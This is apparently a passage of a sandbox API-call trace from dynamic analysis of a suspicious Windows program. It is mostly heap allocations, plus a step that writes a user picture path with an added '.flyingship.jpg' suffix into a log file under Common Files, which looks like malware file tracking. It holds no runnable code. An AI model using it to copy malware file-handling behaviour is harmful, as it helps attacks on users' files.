HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0189.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0189.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0189.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x190) returned 0x907778 [0189.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0189.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0189.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0189.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0189.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0189.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0189.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0189.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0189.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0189.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0189.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0189.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0189.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0189.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0189.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.095] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.095] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.095] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0189.096] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.096] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0189.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0189.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0189.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.097] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0189.097] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2ba9, lpOverlapped=0x0) returned 1 [0189.097] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0189.097] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2ba9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.097] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0189.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0189.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0189.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0189.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.flyingship.jpg\r\n", cchWideChar=102, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 102 [0189.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x66) returned 0x8e8320 [0189.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.flyingship.jpg\r\n", cchWideChar=102, lpMultiByteStr=0x8e8320, cbMultiByte=102, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.flyingship.jpg\r\n", lpUsedDefaultChar=0x0) returned 102 [0189.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0189.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0189.098] WriteFile (in: hFile=0x158, lpBuffer=0x906f38*, nNumberOfBytesToWrite=0x65, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x906f38*, lpNumberOfBytesWritten=0x87f43c*=0x65, lpOverlapped=0x0) returned 1 [0189.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0189.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.098] CloseHandle (hObject=0x158) returned 1 [0189.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0189.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0189.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0189.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0189.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0189.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0189.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0189.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0189.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0189.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0189.100] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0189.100] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0189.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0189.101] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0189.101] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.101] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0189.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0189.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0189.102] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0189.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0189.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0189.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0189.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0189.102] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0189.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0189.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0189.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0189.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0189.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0189.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0189.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0189.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0189.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0189.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0189.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0189.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0189.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0189.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0189.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0189.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0189.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0189.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0189.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0189.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0189.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0189.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0189.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0189.106] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0189.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0189.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0189.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 